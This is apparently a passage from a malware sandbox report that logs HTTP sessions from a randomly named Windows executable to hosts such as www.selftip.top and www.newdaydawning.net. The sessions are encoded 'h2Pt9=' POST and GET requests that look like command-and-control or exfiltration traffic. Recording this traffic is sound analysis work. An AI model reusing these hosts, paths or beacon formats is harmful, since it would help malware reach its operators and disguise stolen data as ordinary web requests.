                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 78 50 50 33 45 76 7a 70 59 4b 77 63 36 6c 47 67 6c 68 44 78 6e 37 2f 41 4e 47 50 42 4d 50 73 78 46 2b 6d 65 62 55 69 76 65 78 52 50 6a 7a 4d 46 47 71 59 39 31 6c 2f 62 33 59 70 59 68 4a 46 6e 47 75 6a 48 71 53 37 4e 30 41 35 62 71 39 6d 57 77 68 57 6f 68 7a 7a 47 39 79 4b 57 2b 64 74 68 44 71 58 2b 57 33 39 51 6c 49 42 73 77 79 4a 78 52 44 74 63 50 6d 71 4c 79 71 55 49 6e 69 50 36 44 75 64 41 75 45 67 4f 38 62 6e 75 2b 31 4a 6f 6e 72 7a 5a 46 72 33 4e 54 35 39 30 41 5a 4c 51 6a 42 35 66 77 37 44 33 53 4e 64 38 58 46 6a 6e 61 5a 77 61 76 4b 36 70 52 4c 48 45 52 69 6e 39 4b 31 57 74 70 79 4c 6c 39 63 4d 4b 76 77 2b 65 6c 53 47 62 2b 4c 52 74 4a 67 4f 52 54 51 64 65 51 4d 50 58 37 4c 79 42 33 54 30 51 66 65 6b 33 76 67 46 54 4e 6f 68 33 7a 36 58 53 56 49 75 53 62 66 4d 44 2b 51 34 76 44 61 79 52 6b 65 49 6a 43 6e 53 49 45 38 34 58 6a 79 32 68 32 6d 59 4a 66 50 [TRUNCATED]
                                  Data Ascii: h2Pt9=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9xPP3EvzpYKwc6lGglhDxn7/ANGPBMPsxF+mebUivexRPjzMFGqY91l/b3YpYhJFnGujHqS7N0A5bq9mWwhWohzzG9yKW+dthDqX+W39QlIBswyJxRDtcPmqLyqUIniP6DudAuEgO8bnu+1JonrzZFr3NT590AZLQjB5fw7D3SNd8XFjnaZwavK6pRLHERin9K1WtpyLl9cMKvw+elSGb+LRtJgORTQdeQMPX7LyB3T0Qfek3vgFTNoh3z6XSVIuSbfMD+Q4vDayRkeIjCnSIE84Xjy2h2mYJfP+wjg3qz+itTmmLs87u83PSwROFL/X1CQ/z2+cogCM4EuY/NYWkPEuGHYlPCxnRDNCMYAQRb49cI16lbjj1aun+cKmggMC0zN+WSAQvXKIqKzGKEoJvWNLyceHcxnQHO148A6h3u444gVZw1075CdyxNFfz+4hJSOwDd/gKt4yf/ANfqmIdVbmamf3iC6iRUNK+Tm6V+/T7Ec8nWGHHNNlJZEw8LByU5DYgM7OswVIJH8V6X+D8gSC4VrGnMKT0Kvl18muOlZp7uUkLiGNh7C4FcUHwXNmaD83GQa3XJ7jnFNuXgRQ6EahbrFPN/qhlZvOqiTXQaH2YdSE6fYEC7Fe7Eb53vPLvoZagXNTsf+H5kguh5771cb/n/DsekqL/K8Y2gQRuhqP6zyy0k0dwijAy0ZRI4u6ziQGT6APwOL0KCEhT5CrPSj0OFr+i0eAaRXTn0oBXgQBnTuX7OeAQ6pYTeU7UME3xTsgtBpnNBEUVoTUxffu5VzibKhhcN5Zwf0HkBz4Lw+GBHn22nI1gIbRugGJGLLMeCNW4XznxOablhPoOy2AXJx50ECQOi5lshIaSjBlt0RYVgSqsPAfKSZ3J6tm2VrqSeKSvYGmxdWxitT3GVEdEZiJSb48EI9HQ8nlIySNZ+cG3U281Nwt6aq0DaxAh3nNXBZs6 [TRUNCATED]
                                  Sep 16, 2024 09:32:10.014921904 CEST3454OUTData Raw: 71 77 37 6a 67 70 44 32 69 62 45 4f 52 7a 43 58 6d 39 30 44 31 6e 36 41 53 6d 4d 31 33 6b 6f 41 74 5a 2f 74 6d 75 30 43 6c 6d 74 68 70 74 46 30 37 50 55 4d 38 6a 6e 67 42 52 7a 31 4b 51 72 4a 4f 37 78 52 47 5a 5a 64 51 6f 50 65 41 4c 36 5a 66 55
                                  Data Ascii: qw7jgpD2ibEORzCXm90D1n6ASmM13koAtZ/tmu0ClmthptF07PUM8jngBRz1KQrJO7xRGZZdQoPeAL6ZfUJAKFGMx8GsCrH2+5uJMFnf3TkagbUXYUUCuSHpi6aRJ4M7EYNSqwetjEuZ7q+MFAr8jywzZc2uRLVKVi6FEekUjQ7AkoPhSeo72ShbTDFA53MnWOULyR2uu8UtMCquDWaPRh2bUVHtp2LWMs0fpOOUeuaYdoFF2Dw
                                  Sep 16, 2024 09:32:10.689867973 CEST918INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:10 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.455837199.192.21.169805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:12.556477070 CEST509OUTGET /85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:13.167406082 CEST933INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:13 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.45583844.213.25.70805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:18.237884998 CEST786OUTPOST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 50 49 64 30 52 55 7a 48 7a 53 50 44 4c 79 62 6e 69 2b 46 42 39 5a 47 78 7a 63 71 66 37 49 79 75 6b 6f 72 4f 7a 47 77 61 63 6d 33 36 64 56 45 53 74 58 45 65 70 2b 64 41 46 6b 76 5a 45 34 2b 58 41 56 6e 30 38 47 4a 45 70 64 72 64 77 4e 68 54 65 42 2b 58 72 31 41 37 6b 38 65 71 6c 43 6a 70 65 6f 35 59 44 4b 55 6e 72 44 70 55 31 55 6c 6c 7a 6e 36 2b 57 6f 7a 39 71 4c 6e 53 64 69 46 52 57 66 33 4f 6b 69 38 35 4c 33 35 6b 55 32 32 7a 31 7a 4d 50 58 4a 52 4d 56 43 30 41 4a 36 4b 53 4b 6b 4a 62 71 2f 6c 32 68 46 71 4c 47 75 5a 39 65 44 4b 7a 77 3d 3d
                                  Data Ascii: h2Pt9=db++YVdeF6Zd/PId0RUzHzSPDLybni+FB9ZGxzcqf7IyukorOzGwacm36dVEStXEep+dAFkvZE4+XAVn08GJEpdrdwNhTeB+Xr1A7k8eqlCjpeo5YDKUnrDpU1Ullzn6+Woz9qLnSdiFRWf3Oki85L35kU22z1zMPXJRMVC0AJ6KSKkJbq/l2hFqLGuZ9eDKzw==
                                  Sep 16, 2024 09:32:19.472023964 CEST489INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:18 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                  Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
                                  Sep 16, 2024 09:32:19.472552061 CEST1236INData Raw: 35 32 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e
                                  Data Ascii: 52UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">9cc<script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const cur
                                  Sep 16, 2024 09:32:19.472603083 CEST224INData Raw: 73 68 65 65 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72
                                  Data Ascii: sheet.setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTML
                                  Sep 16, 2024 09:32:19.472640038 CEST1143INData Raw: 09 09 09 09 09 09 63 75 72 72 65 6e 74 53 74 79 6c 65 73 68 65 65 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 0a
                                  Data Ascii: currentStylesheet.setAttribute( 'data-ls-optimized', '1' )}}} catch ( error ) {console.warn( error )}if ( currentStylesheet.parentElement.tagName !== 'HEAD' ) {/* always make sure that thos
                                  Sep 16, 2024 09:32:19.493143082 CEST1236INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                  Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                  Sep 16, 2024 09:32:19.493176937 CEST224INData Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                  Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width
                                  Sep 16, 2024 09:32:19.493211031 CEST1236INData Raw: 3a 33 33 70 78 3b 68 65 69 67 68 74 3a 33 33 70 78 3b 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 2e 33 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67
                                  Data Ascii: :33px;height:33px;margin:0px auto !important;padding:0.3em !important;}.tve-m-trigger:not(.tve-triggered-icon) .tcb-icon-close{display:none;}.thrv_widget_menu.thrv_wrapper{padding:0px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-swi
                                  Sep 16, 2024 09:32:19.493258953 CEST1236INData Raw: 78 3b 74 6f 70 3a 30 70 78 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75
                                  Data Ascii: x;top:0px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li:not(#increase-spec):not(.ccls){padding:0px;width:100%;margin-top:0px;margin-bottom:0px;-webkit-tap-highlight-color:transparent;margin-left:0px !i
                                  Sep 16, 2024 09:32:19.493292093 CEST1236INData Raw: 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 30 2c 32 35 30 2c 32 35 30 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 74 68 72 76 5f 77 69
                                  Data Ascii: "] ul.tve_w_menu li li{background-color:rgb(250,250,250);box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="dark-tmp"] ul.tve_w_menu{background-color:rgb(30,30,31);}.thrv_widget_menu.thrv_wrapper[cla
                                  Sep 16, 2024 09:32:19.493325949 CEST1236INData Raw: 6c 6f 63 6b 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 30 2e 33 73 20 65 61 73 65 20 30 73 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63
                                  Data Ascii: lock;transition:opacity 0.3s ease 0s;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger .tcb-icon-close{position:absolute;top:0px;left:50%;transform:translateX(-50%);opacity:0;}.thrv_widge
                                  Sep 16, 2024 09:32:19.493360043 CEST1236INData Raw: 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2c 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d
                                  Data Ascii: bkit-scrollbar,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu::-webkit-scrollbar{width:14px;height:8px;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-m


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.45583944.213.25.70805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:20.776063919 CEST806OUTPOST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 72 30 64 32 33 63 7a 57 44 53 4d 47 4c 79 62 2b 53 2b 65 42 39 46 47 78 79 6f 63 63 49 73 79 75 46 59 72 4a 33 53 77 4b 4d 6d 33 69 74 56 46 57 74 58 62 65 70 7a 69 41 48 67 76 5a 41 6f 2b 58 41 6c 6e 30 75 75 47 46 35 64 70 45 67 4e 5a 58 65 42 2b 58 72 31 41 37 6b 5a 31 71 6c 61 6a 71 75 59 35 5a 6e 65 58 71 4c 44 6f 54 31 55 6c 68 7a 6e 41 2b 57 6f 64 39 6f 76 64 53 65 4b 46 52 57 76 33 4f 56 69 6a 79 4c 33 2f 71 30 33 4a 7a 56 65 2b 58 6e 74 41 48 55 47 59 42 34 62 76 54 4d 31 54 4b 62 65 79 6b 68 68 5a 57 42 6e 74 77 64 2b 44 6f 30 6b 42 4d 6d 74 33 38 74 4d 69 61 67 78 49 6e 2f 79 6f 76 44 49 3d
                                  Data Ascii: h2Pt9=db++YVdeF6Zd/r0d23czWDSMGLyb+S+eB9FGxyoccIsyuFYrJ3SwKMm3itVFWtXbepziAHgvZAo+XAln0uuGF5dpEgNZXeB+Xr1A7kZ1qlajquY5ZneXqLDoT1UlhznA+Wod9ovdSeKFRWv3OVijyL3/q03JzVe+XntAHUGYB4bvTM1TKbeykhhZWBntwd+Do0kBMmt38tMiagxIn/yovDI=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.45584044.213.25.70805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:23.331491947 CEST10888OUTPOST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 72 30 64 32 33 63 7a 57 44 53 4d 47 4c 79 62 2b 53 2b 65 42 39 46 47 78 79 6f 63 63 49 6b 79 75 33 38 72 50 51 75 77 4a 4d 6d 33 72 4e 56 49 57 74 58 53 65 70 61 72 41 48 73 52 5a 43 67 2b 59 42 46 6e 6c 71 36 47 4c 4a 64 70 4d 41 4e 69 54 65 41 6b 58 72 46 45 37 6b 70 31 71 6c 61 6a 71 6f 63 35 50 44 4b 58 35 37 44 70 55 31 55 70 6c 7a 6d 4f 2b 57 52 67 39 6f 36 2f 53 75 71 46 52 32 2f 33 64 33 36 6a 75 62 33 39 70 30 33 52 7a 56 53 6c 58 6e 77 73 48 55 79 32 42 34 76 76 52 59 45 58 5a 34 53 57 77 79 52 55 48 77 58 30 39 71 57 79 6b 6e 55 31 4d 55 56 65 34 2f 4d 53 59 6a 67 35 77 39 61 6a 38 58 34 67 44 65 49 33 41 52 37 74 41 54 6a 48 47 45 39 78 64 32 50 51 30 4a 52 52 66 2b 4a 35 6b 6c 65 6f 4f 54 75 68 44 47 64 47 68 4c 52 44 73 49 50 68 36 68 48 75 62 32 61 4f 38 63 63 45 4e 34 58 75 47 75 71 75 76 6e 4c 43 74 36 71 55 56 2b 56 44 77 56 53 47 68 65 75 38 4b 70 55 55 64 72 49 2b 5a 35 69 36 68 37 4d 55 6f 51 56 65 78 30 72 6f 50 52 4a 2b [TRUNCATED]
                                  Data Ascii: h2Pt9=db++YVdeF6Zd/r0d23czWDSMGLyb+S+eB9FGxyoccIkyu38rPQuwJMm3rNVIWtXSeparAHsRZCg+YBFnlq6GLJdpMANiTeAkXrFE7kp1qlajqoc5PDKX57DpU1UplzmO+WRg9o6/SuqFR2/3d36jub39p03RzVSlXnwsHUy2B4vvRYEXZ4SWwyRUHwX09qWyknU1MUVe4/MSYjg5w9aj8X4gDeI3AR7tATjHGE9xd2PQ0JRRf+J5kleoOTuhDGdGhLRDsIPh6hHub2aO8ccEN4XuGuquvnLCt6qUV+VDwVSGheu8KpUUdrI+Z5i6h7MUoQVex0roPRJ+JfbRAkmGCo45DFOna9+lnibizL2/IXPtINyp0QlEy6by4Ccfn/cbWkQgducGf/N3Vvk6fM+tl6oQAR4IAUL7qfX0y+Rkye3EvpNb0jan+rGX7h+0OYE5rnNvL1sXEvXRUCZ3bOCQDh+/HMAkM/Gy/W1hTWiLjZFnNiJv+jp5KR27zSZzB+nsSdU/ovYyzwH9z6LqkfwWI1qLxIo81eWfTn6GqWfByxEjUhZe+O/uVTzrxLIFdHSJkttZrDAoqsZMIUIf96B3kcKxZwNsXui4oYCv4uz/sxEbiWMHTxqy3Nx/7igSuyRNY50rGFdHugDDct6xpAqyB1uyUZ0cp6yKnIfkvgwoFI+ShW1LLV/D/VBCdTWb35P0tnfQYNjiYFXOiZWMSua2bb5f1kZPDftldhDOw9lfZf4rewNqHvgt0TGebKW54/3xb/oti+DVEWfmyQEKyN7v/IMqA8NJbrrmTZahT4d0+iPQR0kLoaaLYH+/FAEYxfAWJ32X5tlsC7lKMsYpLnwtJ/0qKhduoUTs4Be7JpO3a/yftmdT5F88IWVjWQ9RUHhOYw4RvUIZIG3QjeVhLI+D0IgJOyWld0Z9yLrEA+MpzgDmFb8bgQY5qX+/l2dA1GcW5zl39TLYXCAXo3UzDuNnrQJu/ou2XzBAPnJoKfA9LkxmXW [TRUNCATED]
                                  Sep 16, 2024 09:32:24.540472984 CEST489INHTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:23 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                  Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
